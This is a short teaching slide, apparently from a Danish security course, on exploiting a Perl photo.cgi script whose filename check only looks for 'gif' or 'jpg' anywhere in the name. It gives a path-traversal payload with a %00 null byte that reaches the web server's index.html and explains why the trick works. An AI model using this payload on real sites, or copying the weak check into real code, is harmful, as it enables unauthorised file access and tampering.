Exploit af photo.cgi - 3

• if ($filename =~ m/gif/) { $type = '.gif'; }

• elsif ($filename =~ m/jpg/) { $type = '.jpg'; }

• else{ &Not_Valid_Image}

• Filen skal indeholde gif eller jpg.

• (Han tror ende på .gif eller .jpg)

• Løsning:

• /jfs/\../../../../../../../export/www/htdocs/index.html%00.gif

• %00 bliver til en NULL = C's string terminator